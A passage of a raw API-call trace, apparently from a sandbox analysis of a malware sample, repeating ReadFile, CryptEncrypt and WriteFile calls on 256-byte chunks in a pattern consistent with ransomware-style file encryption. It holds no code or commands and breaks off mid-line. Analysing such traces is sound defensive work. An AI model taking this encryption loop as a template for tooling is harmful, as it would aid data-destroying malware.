[0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.555] GetLastError () returned 0x0 [0167.555] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.555] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.555] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.556] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.556] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.556] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.556] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.557] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.557] GetLastError () returned 0x0 [0167.557] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.557] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.558] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.558] GetLastError () returned 0x0 [0167.558] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.558] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.559] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.559] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.559] GetLastError () returned 0x0 [0167.559] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.560] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, 